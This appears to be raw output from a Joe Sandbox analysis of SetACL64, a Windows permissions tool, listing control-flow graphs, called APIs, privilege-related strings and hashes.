                                        • Opcode Fuzzy Hash: 054ea4d1a2d6c0b3adbe8e4b57b4ca5633b3a582fabd17bd529d99db77766a5b
                                        • Instruction Fuzzy Hash: FA42A1A2B19742C6FB149B65D4483AD23A2FF44B88F404139DB4E97BA5DF7EE890C350

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2473 7ff686843a5e-7ff686843a8e AdjustTokenPrivileges 2474 7ff686843aa9-7ff686843abc GetLastError CloseHandle 2473->2474 2475 7ff686843a90-7ff686843a98 GetLastError 2473->2475 2476 7ff686843abd-7ff686843ac6 2474->2476 2475->2474 2477 7ff686843a9a-7ff686843aa7 CloseHandle 2475->2477 2478 7ff686843ac8-7ff686843adf 2476->2478 2479 7ff686843aff-7ff686843b1b 2476->2479 2477->2476 2482 7ff686843afa call 7ff6868621a0 2478->2482 2483 7ff686843ae1-7ff686843af4 2478->2483 2480 7ff686843b1d-7ff686843b34 2479->2480 2481 7ff686843b54-7ff686843b56 2479->2481 2484 7ff686843b36-7ff686843b49 2480->2484 2485 7ff686843b4f call 7ff6868621a0 2480->2485 2486 7ff686843b5c-7ff686843be2 call 7ff686833f80 * 2 call 7ff68683d260 2481->2486 2487 7ff686843c5e-7ff686843d83 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2481->2487 2482->2479 2483->2482 2488 7ff6868443fb-7ff686844400 call 7ff6868688fc 2483->2488 2484->2485 2490 7ff686844401-7ff686844406 call 7ff6868688fc 2484->2490 2485->2481 2514 7ff686843c1c-7ff686843c25 2486->2514 2515 7ff686843be4-7ff686843bfb 2486->2515 2512 7ff686843dbc-7ff686843dd8 2487->2512 2513 7ff686843d85-7ff686843d9c 2487->2513 2488->2490 2502 7ff686844407-7ff68684440c call 7ff6868688fc 2490->2502 2511 7ff68684440d-7ff686844412 call 7ff6868688fc 2502->2511 2539 7ff686844413-7ff686844418 call 7ff6868688fc 2511->2539 2520 7ff686843dda-7ff686843df1 2512->2520 2521 7ff686843e11-7ff686843e13 2512->2521 2518 7ff686843db7 call 7ff6868621a0 2513->2518 2519 7ff686843d9e-7ff686843db1 2513->2519 2514->2487 2516 7ff686843c27-7ff686843c3e 2514->2516 2522 7ff686843c16-7ff686843c1b call 7ff6868621a0 2515->2522 2523 7ff686843bfd-7ff686843c10 2515->2523 2527 7ff686843c59 call 7ff6868621a0 2516->2527 2528 7ff686843c40-7ff686843c53 2516->2528 2518->2512 2519->2511 2519->2518 2531 7ff686843e0c call 7ff6868621a0 2520->2531 2532 7ff686843df3-7ff686843e06 2520->2532 2525 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 2521->2525 2526 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2521->2526 2522->2514 2523->2502 2523->2522 2563 7ff686843ed9-7ff686843ee2 2525->2563 2564 7ff686843ea1-7ff686843eb8 2525->2564 2561 7ff686844079-7ff686844095 2526->2561 2562 7ff686844042-7ff686844059 2526->2562 2527->2487 2528->2527 2537 7ff6868443dd-7ff6868443fa call 7ff6868688fc * 5 2528->2537 2531->2521 2532->2531 2532->2539 2537->2488 2550 7ff686844419-7ff68684441e call 7ff6868688fc 2539->2550 2565 7ff68684441f-7ff686844424 call 7ff6868688fc 2550->2565 2569 7ff686844097-7ff6868440ae 2561->2569 2570 7ff6868440ce-7ff6868440d0 2561->2570 2567 7ff68684405b-7ff68684406e 2562->2567 2568 7ff686844074 call 7ff6868621a0 2562->2568 2563->2526 2574 7ff686843ee4-7ff686843efb 2563->2574 2571 7ff686843eba-7ff686843ecd 2564->2571 2572 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 2564->2572 2586 7ff686844425-7ff68684442a call 7ff6868688fc 2565->2586 2567->2565 2567->2568 2568->2561 2579 7ff6868440c9 call 7ff6868621a0 2569->2579 2580 7ff6868440b0-7ff6868440c3 2569->2580 2582 7ff6868441d8-7ff686844209 2570->2582 2583 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 2570->2583 2571->2550 2571->2572 2572->2563 2575 7ff686843f16 call 7ff6868621a0 2574->2575 2576 7ff686843efd-7ff686843f10 2574->2576 2575->2526 2576->2537 2576->2575 2579->2570 2580->2579 2580->2586 2587 7ff686844268-7ff686844294 2582->2587 2588 7ff68684420b-7ff68684420e 2582->2588 2635 7ff686844196-7ff68684419f 2583->2635 2636 7ff68684415e-7ff686844175 2583->2636 2608 7ff68684442b-7ff686844430 call 7ff6868688fc 2586->2608 2597 7ff686844296-7ff686844299 2587->2597 2598 7ff686844314-7ff686844320 2587->2598 2595 7ff686844210-7ff686844220 2588->2595 2601 7ff686844239-7ff686844266 2595->2601 2602 7ff686844222-7ff686844233 call 7ff68685e4b0 2595->2602 2606 7ff6868442a0-7ff6868442b4 2597->2606 2603 7ff686844335-7ff686844341 2598->2603 2604 7ff686844322-7ff68684432c call 7ff68685e4b0 2598->2604 2601->2587 2601->2595 2602->2601 2628 7ff686844356-7ff68684435b 2602->2628 2611 7ff68684435d-7ff686844367 call 7ff686844810 2603->2611 2612 7ff686844343-7ff686844354 call 7ff68685e4b0 2603->2612 2619 7ff686844331-7ff686844333 2604->2619 2614 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 2606->2614 2615 7ff6868442cd-7ff6868442d2 2606->2615 2637 7ff686844369-7ff686844372 2611->2637 2638 7ff6868443b1-7ff6868443dc call 7ff686862180 2611->2638 2612->2611 2612->2628 2614->2615 2614->2628 2624 7ff6868442ea-7ff686844312 2615->2624 2625 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 2615->2625 2619->2603 2619->2628 2624->2598 2624->2606 2625->2624 2625->2628 2628->2638 2635->2582 2644 7ff6868441a1-7ff6868441b8 2635->2644 2639 7ff686844177-7ff68684418a 2636->2639 2640 7ff686844190-7ff686844195 call 7ff6868621a0 2636->2640 2641 7ff68684439e-7ff6868443a1 2637->2641 2642 7ff686844374-7ff686844396 call 7ff68684a350 2637->2642 2639->2608 2639->2640 2640->2635 2650 7ff6868443af 2641->2650 2651 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 2641->2651 2642->2638 2656 7ff686844398 2642->2656 2648 7ff6868441ba-7ff6868441cd 2644->2648 2649 7ff6868441d3 call 7ff6868621a0 2644->2649 2648->2537 2648->2649 2649->2582 2650->2638 2651->2650 2656->2641
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                        • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                        • API String ID: 637398405-1541018277
                                        • Opcode ID: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                        • Instruction ID: 7297aa4543ed2d95f5a876edb80cd7939455c8c289724e75e36796354c795d8c
                                        • Opcode Fuzzy Hash: 784cef284bd62b761dc482660273cd6918b6e7e394081ec7e667ddc71951a65c
                                        • Instruction Fuzzy Hash: ED22A5B2A18782C2EE10CB55E4483696365FF847E4F505139E69D87AE9DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2657 7ff68685e4b0-7ff68685e4f4 2658 7ff68685e4f6-7ff68685e4fb call 7ff68686d6ac 2657->2658 2659 7ff68685e4ff-7ff68685e507 2657->2659 2658->2659 2661 7ff68685e50c-7ff68685e519 ConvertStringSidToSidW 2659->2661 2662 7ff68685e509 2659->2662 2664 7ff68685e53b-7ff68685e574 2661->2664 2665 7ff68685e51b-7ff68685e536 call 7ff68685ec20 LocalFree 2661->2665 2662->2661 2666 7ff68685e576 2664->2666 2667 7ff68685e579-7ff68685e583 2664->2667 2675 7ff68685ebc8-7ff68685ebee call 7ff686862180 2665->2675 2666->2667 2669 7ff68685e6fd-7ff68685e708 call 7ff68685f9c0 2667->2669 2670 7ff68685e589-7ff68685e597 2667->2670 2680 7ff68685e70a-7ff68685e71c 2669->2680 2681 7ff68685e720-7ff68685e762 call 7ff686833f80 call 7ff686834750 2669->2681 2673 7ff68685e599 2670->2673 2674 7ff68685e5b3 2670->2674 2677 7ff68685e5a0-7ff68685e5a4 2673->2677 2678 7ff68685e5b6-7ff68685e5b9 2674->2678 2677->2678 2682 7ff68685e5a6-7ff68685e5b1 2677->2682 2678->2669 2683 7ff68685e5bf-7ff68685e5c8 2678->2683 2680->2681 2702 7ff68685e79a-7ff68685e7b0 2681->2702 2703 7ff68685e764-7ff68685e77a 2681->2703 2682->2674 2682->2677 2683->2669 2686 7ff68685e5ce-7ff68685e5d5 2683->2686 2688 7ff68685e5d7-7ff68685e5dc 2686->2688 2689 7ff68685e5e1-7ff68685e602 2686->2689 2691 7ff68685eb3d-7ff68685eb41 2688->2691 2692 7ff68685e607-7ff68685e618 call 7ff686833f80 2689->2692 2693 7ff68685e604 2689->2693 2694 7ff68685eb7d-7ff68685eb92 2691->2694 2695 7ff68685eb43-7ff68685eb59 2691->2695 2705 7ff68685e61a-7ff68685e630 2692->2705 2706 7ff68685e650-7ff68685e67a 2692->2706 2693->2692 2700 7ff68685ebc6 2694->2700 2701 7ff68685eb94-7ff68685ebaa 2694->2701 2698 7ff68685eb5b-7ff68685eb6e 2695->2698 2699 7ff68685eb74-7ff68685eb79 call 7ff6868621a0 2695->2699 2698->2699 2707 7ff68685ec19-7ff68685ec1f call 7ff6868688fc 2698->2707 2699->2694 2700->2675 2709 7ff68685ebac-7ff68685ebbf 2701->2709 2710 7ff68685ebc1 call 7ff6868621a0 2701->2710 2713 7ff68685e7f2 2702->2713 2714 7ff68685e7b2-7ff68685e7eb call 7ff686860c18 call 7ff686835cf0 2702->2714 2711 7ff68685e77c-7ff68685e78f 2703->2711 2712 7ff68685e795 call 7ff6868621a0 2703->2712 2715 7ff68685e64b call 7ff6868621a0 2705->2715 2716 7ff68685e632-7ff68685e645 2705->2716 2719 7ff68685ebf5-7ff68685ebfa call 7ff686829910 2706->2719 2720 7ff68685e680-7ff68685e695 2706->2720 2709->2710 2722 7ff68685ebef-7ff68685ebf4 call 7ff6868688fc 2709->2722 2710->2700 2711->2712 2724 7ff68685ebfb-7ff68685ec00 call 7ff6868688fc 2711->2724 2712->2702 2721 7ff68685e7f6 2713->2721 2714->2721 2766 7ff68685e7ed-7ff68685e7f0 2714->2766 2715->2706 2716->2715 2727 7ff68685ec13-7ff68685ec18 call 7ff6868688fc 2716->2727 2719->2724 2732 7ff68685e69a-7ff68685e6b5 call 7ff686833f80 2720->2732 2733 7ff68685e697 2720->2733 2734 7ff68685e7f9-7ff68685e7fd 2721->2734 2722->2719 2746 7ff68685ec01-7ff68685ec06 call 7ff6868688fc 2724->2746 2727->2707 2755 7ff68685e6ed-7ff68685e6f9 2732->2755 2756 7ff68685e6b7-7ff68685e6cd 2732->2756 2733->2732 2742 7ff68685e823-7ff68685e826 2734->2742 2743 7ff68685e7ff-7ff68685e802 2734->2743 2749 7ff68685e82c-7ff68685e875 call 7ff686829520 * 2 2742->2749 2750 7ff68685e9c4 2742->2750 2743->2742 2748 7ff68685e804-7ff68685e810 2743->2748 2767 7ff68685ec07-7ff68685ec0c call 7ff6868688fc 2746->2767 2748->2742 2768 7ff68685e812-7ff68685e81d 2748->2768 2774 7ff68685e87a-7ff68685e89c DsGetDcNameW 2749->2774 2775 7ff68685e877 2749->2775 2752 7ff68685e9c7-7ff68685e9ea call 7ff68685f3c0 2750->2752 2765 7ff68685e9ef-7ff68685e9f5 2752->2765 2755->2669 2761 7ff68685e6e8 call 7ff6868621a0 2756->2761 2762 7ff68685e6cf-7ff68685e6e2 2756->2762 2761->2755 2762->2727 2762->2761 2771 7ff68685e9fb-7ff68685ea00 2765->2771 2772 7ff68685eaa3-7ff68685eaab 2765->2772 2766->2734 2789 7ff68685ec0d-7ff68685ec12 call 7ff6868688fc 2767->2789 2768->2742 2778 7ff68685ea1d-7ff68685ea22 2771->2778 2779 7ff68685ea02-7ff68685ea18 call 7ff68685f3c0 2771->2779 2776 7ff68685eaad-7ff68685eac3 2772->2776 2777 7ff68685eae4-7ff68685eaec 2772->2777 2783 7ff68685e912-7ff68685e91a 2774->2783 2784 7ff68685e89e-7ff68685e8a3 2774->2784 2775->2774 2781 7ff68685eac5-7ff68685ead8 2776->2781 2782 7ff68685eade-7ff68685eae3 call 7ff6868621a0 2776->2782 2787 7ff68685eb24-7ff68685eb39 2777->2787 2788 7ff68685eaee-7ff68685eb04 2777->2788 2778->2772 2786 7ff68685ea24-7ff68685ea6a call 7ff686833f80 call 7ff68685f3c0 2778->2786 2779->2772 2781->2782 2781->2789 2782->2777 2790 7ff68685e91c-7ff68685e92e 2783->2790 2791 7ff68685e951-7ff68685e964 2783->2791 2793 7ff68685e8a6-7ff68685e8ae 2784->2793 2786->2772 2821 7ff68685ea6c-7ff68685ea82 2786->2821 2787->2691 2796 7ff68685eb06-7ff68685eb19 2788->2796 2797 7ff68685eb1f call 7ff6868621a0 2788->2797 2789->2727 2799 7ff68685e94c call 7ff6868621a0 2790->2799 2800 7ff68685e930-7ff68685e943 2790->2800 2801 7ff68685e966-7ff68685e981 call 7ff686833f80 2791->2801 2802 7ff68685e982-7ff68685e98a 2791->2802 2793->2793 2804 7ff68685e8b0-7ff68685e909 call 7ff686833f80 call 7ff68682fe30 call 7ff68683eaf0 2793->2804 2796->2727 2796->2797 2797->2787 2799->2791 2800->2746 2808 7ff68685e949 2800->2808 2801->2802 2802->2752 2812 7ff68685e98c-7ff68685e9a2 2802->2812 2804->2783 2830 7ff68685e90b-7ff68685e911 NetApiBufferFree 2804->2830 2808->2799 2816 7ff68685e9bd-7ff68685e9c2 call 7ff6868621a0 2812->2816 2817 7ff68685e9a4-7ff68685e9b7 2812->2817 2816->2752 2817->2789 2817->2816 2824 7ff68685ea9d-7ff68685eaa2 call 7ff6868621a0 2821->2824 2825 7ff68685ea84-7ff68685ea97 2821->2825 2824->2772 2825->2767 2825->2824 2830->2783
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorFreeLastLockitNamestd::_$AccountBufferConvertLocalLockit::_Lockit::~_LookupSetgloballocaleStringstd::locale::_
                                        • String ID: computername
                                        • API String ID: 1703289946-1800712684
                                        • Opcode ID: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                        • Instruction ID: 898f2eeaf6843ea59616fa1c987da8b1c1ca5a90c25562f0e3334e17b6b24c0e
                                        • Opcode Fuzzy Hash: 16028561b5196d3668939a84b08cd2e3c1b912715faf0080cf177397a5bfcfa2
                                        • Instruction Fuzzy Hash: E72290A2B14B52C6FB008B68E84D3AD2371BF44798F405639DE5E97AD9DF39E841C320

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2831 7ff686843d1b-7ff686843d4b AdjustTokenPrivileges 2832 7ff686843d66-7ff686843d79 GetLastError CloseHandle 2831->2832 2833 7ff686843d4d-7ff686843d55 GetLastError 2831->2833 2835 7ff686843d7a-7ff686843d83 2832->2835 2833->2832 2834 7ff686843d57-7ff686843d64 CloseHandle 2833->2834 2834->2835 2836 7ff686843dbc-7ff686843dd8 2835->2836 2837 7ff686843d85-7ff686843d9c 2835->2837 2840 7ff686843dda-7ff686843df1 2836->2840 2841 7ff686843e11-7ff686843e13 2836->2841 2838 7ff686843db7 call 7ff6868621a0 2837->2838 2839 7ff686843d9e-7ff686843db1 2837->2839 2838->2836 2839->2838 2844 7ff68684440d-7ff686844412 call 7ff6868688fc 2839->2844 2846 7ff686843e0c call 7ff6868621a0 2840->2846 2847 7ff686843df3-7ff686843e06 2840->2847 2842 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 2841->2842 2843 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2841->2843 2871 7ff686843ed9-7ff686843ee2 2842->2871 2872 7ff686843ea1-7ff686843eb8 2842->2872 2869 7ff686844079-7ff686844095 2843->2869 2870 7ff686844042-7ff686844059 2843->2870 2852 7ff686844413-7ff686844418 call 7ff6868688fc 2844->2852 2846->2841 2847->2846 2847->2852 2862 7ff686844419-7ff68684441e call 7ff6868688fc 2852->2862 2873 7ff68684441f-7ff686844424 call 7ff6868688fc 2862->2873 2876 7ff686844097-7ff6868440ae 2869->2876 2877 7ff6868440ce-7ff6868440d0 2869->2877 2874 7ff68684405b-7ff68684406e 2870->2874 2875 7ff686844074 call 7ff6868621a0 2870->2875 2871->2843 2881 7ff686843ee4-7ff686843efb 2871->2881 2878 7ff686843eba-7ff686843ecd 2872->2878 2879 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 2872->2879 2892 7ff686844425-7ff68684442a call 7ff6868688fc 2873->2892 2874->2873 2874->2875 2875->2869 2885 7ff6868440c9 call 7ff6868621a0 2876->2885 2886 7ff6868440b0-7ff6868440c3 2876->2886 2888 7ff6868441d8-7ff686844209 2877->2888 2889 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 2877->2889 2878->2862 2878->2879 2879->2871 2882 7ff686843f16 call 7ff6868621a0 2881->2882 2883 7ff686843efd-7ff686843f10 2881->2883 2882->2843 2883->2882 2893 7ff6868443dd-7ff68684440c call 7ff6868688fc * 8 2883->2893 2885->2877 2886->2885 2886->2892 2894 7ff686844268-7ff686844294 2888->2894 2895 7ff68684420b-7ff68684420e 2888->2895 2942 7ff686844196-7ff68684419f 2889->2942 2943 7ff68684415e-7ff686844175 2889->2943 2914 7ff68684442b-7ff686844430 call 7ff6868688fc 2892->2914 2893->2844 2902 7ff686844296-7ff686844299 2894->2902 2903 7ff686844314-7ff686844320 2894->2903 2901 7ff686844210-7ff686844220 2895->2901 2907 7ff686844239-7ff686844266 2901->2907 2908 7ff686844222-7ff686844233 call 7ff68685e4b0 2901->2908 2911 7ff6868442a0-7ff6868442b4 2902->2911 2909 7ff686844335-7ff686844341 2903->2909 2910 7ff686844322-7ff68684432c call 7ff68685e4b0 2903->2910 2907->2894 2907->2901 2908->2907 2935 7ff686844356-7ff68684435b 2908->2935 2917 7ff68684435d-7ff686844367 call 7ff686844810 2909->2917 2918 7ff686844343-7ff686844354 call 7ff68685e4b0 2909->2918 2926 7ff686844331-7ff686844333 2910->2926 2919 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 2911->2919 2920 7ff6868442cd-7ff6868442d2 2911->2920 2944 7ff686844369-7ff686844372 2917->2944 2945 7ff6868443b1-7ff6868443dc call 7ff686862180 2917->2945 2918->2917 2918->2935 2919->2920 2919->2935 2930 7ff6868442ea-7ff686844312 2920->2930 2931 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 2920->2931 2926->2909 2926->2935 2930->2903 2930->2911 2931->2930 2931->2935 2935->2945 2942->2888 2952 7ff6868441a1-7ff6868441b8 2942->2952 2947 7ff686844177-7ff68684418a 2943->2947 2948 7ff686844190-7ff686844195 call 7ff6868621a0 2943->2948 2949 7ff68684439e-7ff6868443a1 2944->2949 2950 7ff686844374-7ff686844396 call 7ff68684a350 2944->2950 2947->2914 2947->2948 2948->2942 2959 7ff6868443af 2949->2959 2960 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 2949->2960 2950->2945 2967 7ff686844398 2950->2967 2957 7ff6868441ba-7ff6868441cd 2952->2957 2958 7ff6868441d3 call 7ff6868621a0 2952->2958 2957->2893 2957->2958 2958->2888 2959->2945 2960->2959 2967->2949
                                        APIs
                                        Strings
                                        • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
                                        • Prepare, xrefs: 00007FF686843E67, 00007FF686844124
                                        • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
                                        • SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                        • String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
                                        • API String ID: 637398405-1701055250
                                        • Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                        • Instruction ID: d6ebd7ad4d04b0742e7c3d1876236b290937e98c7a16907e16e8ffb0d61cd811
                                        • Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                        • Instruction Fuzzy Hash: ACE1A2B2B18786C2EE10CB55E4483696365FF847E4F505139EA5D87AE8DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3047 7ff68683d304-7ff68683d30a 3048 7ff68683d310-7ff68683d318 3047->3048 3049 7ff68683d65f-7ff68683d668 LeaveCriticalSection 3047->3049 3050 7ff68683d326-7ff68683d32e 3048->3050 3051 7ff68683d31a-7ff68683d320 3048->3051 3052 7ff68683d669-7ff68683d66d 3049->3052 3053 7ff68683d35b-7ff68683d35d 3050->3053 3054 7ff68683d330-7ff68683d355 GetSystemTimeAsFileTime 3050->3054 3051->3049 3051->3050 3055 7ff68683d6a6-7ff68683d6aa 3052->3055 3056 7ff68683d66f-7ff68683d685 3052->3056 3057 7ff68683d36f-7ff68683d371 3053->3057 3058 7ff68683d35f-7ff68683d369 GetCurrentThreadId 3053->3058 3054->3053 3061 7ff68683d6ac-7ff68683d6c2 3055->3061 3062 7ff68683d6df-7ff68683d6e7 3055->3062 3059 7ff68683d687-7ff68683d69a 3056->3059 3060 7ff68683d6a0-7ff68683d6a5 call 7ff6868621a0 3056->3060 3065 7ff68683d527-7ff68683d5b0 LeaveCriticalSection call 7ff6868621d4 3057->3065 3066 7ff68683d377-7ff68683d3a4 GetUserNameExW 3057->3066 3058->3057 3059->3060 3067 7ff68683d74e-7ff68683d753 call 7ff6868688fc 3059->3067 3060->3055 3069 7ff68683d6d9-7ff68683d6de call 7ff6868621a0 3061->3069 3070 7ff68683d6c4-7ff68683d6d7 3061->3070 3063 7ff68683d6e9-7ff68683d6ff 3062->3063 3064 7ff68683d71b-7ff68683d741 call 7ff686862180 3062->3064 3074 7ff68683d716 call 7ff6868621a0 3063->3074 3075 7ff68683d701-7ff68683d714 3063->3075 3089 7ff68683d5cc-7ff68683d5e9 3065->3089 3090 7ff68683d5b2-7ff68683d5bb 3065->3090 3077 7ff68683d3b9-7ff68683d3e4 call 7ff686835790 GetUserNameExW 3066->3077 3078 7ff68683d3a6-7ff68683d3b3 GetLastError 3066->3078 3072 7ff68683d754-7ff68683d759 call 7ff6868688fc 3067->3072 3069->3062 3070->3069 3070->3072 3074->3064 3075->3074 3099 7ff68683d3e6-7ff68683d3ee GetLastError 3077->3099 3100 7ff68683d3f0-7ff68683d3f7 3077->3100 3078->3077 3087 7ff68683d45a-7ff68683d45c 3078->3087 3087->3065 3092 7ff68683d462-7ff68683d4c9 call 7ff686830520 call 7ff68682a740 3087->3092 3096 7ff68683d5eb-7ff68683d600 call 7ff686833f80 3089->3096 3097 7ff68683d605-7ff68683d60c 3089->3097 3094 7ff68683d5bd 3090->3094 3095 7ff68683d5c1-7ff68683d5c7 call 7ff686833f80 3090->3095 3122 7ff68683d51c-7ff68683d526 call 7ff686829720 3092->3122 3123 7ff68683d4cb-7ff68683d4d2 3092->3123 3094->3095 3095->3089 3096->3097 3105 7ff68683d62b-7ff68683d62e 3097->3105 3106 7ff68683d60e-7ff68683d627 call 7ff686833f80 3097->3106 3101 7ff68683d41a-7ff68683d41d 3099->3101 3102 7ff68683d400-7ff68683d409 3100->3102 3101->3087 3109 7ff68683d41f-7ff68683d437 3101->3109 3102->3102 3108 7ff68683d40b-7ff68683d417 call 7ff686833f80 3102->3108 3111 7ff68683d64a-7ff68683d65d call 7ff68683ea60 3105->3111 3112 7ff68683d630-7ff68683d639 3105->3112 3106->3105 3108->3101 3116 7ff68683d439-7ff68683d44c 3109->3116 3117 7ff68683d452-7ff68683d455 call 7ff6868621a0 3109->3117 3111->3052 3119 7ff68683d63b 3112->3119 3120 7ff68683d63e-7ff68683d649 call 7ff686833f80 3112->3120 3116->3117 3127 7ff68683d748-7ff68683d74d call 7ff6868688fc 3116->3127 3117->3087 3119->3120 3120->3111 3122->3065 3129 7ff68683d4f7-7ff68683d502 3123->3129 3130 7ff68683d4d4-7ff68683d4dd 3123->3130 3127->3067 3129->3122 3136 7ff68683d504-7ff68683d50d 3129->3136 3134 7ff68683d4df 3130->3134 3135 7ff68683d4e2-7ff68683d4f2 call 7ff686833f80 3130->3135 3134->3135 3135->3129 3140 7ff68683d50f 3136->3140 3141 7ff68683d512-7ff68683d51b call 7ff686833f80 3136->3141 3140->3141 3141->3122
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalErrorEventLastLeaveNameSectionTimeUser$CurrentFileMutexObjectReleaseResetSingleSystemThreadWait
                                        • String ID:
                                        • API String ID: 3424761043-0
                                        • Opcode ID: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                        • Instruction ID: 5a9a26cd481a4aafe4b8519b3825663fe5e4ac1cd163496f22314ffde96ce16c
                                        • Opcode Fuzzy Hash: 82ea7e4afd397da255eb45e089590796cd57700379ab681c382546437c843004
                                        • Instruction Fuzzy Hash: 93C18AA2B18B42C6EB108F64E4842AC3371FF49B98F404639DA5D977A9DF3DE944C760

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
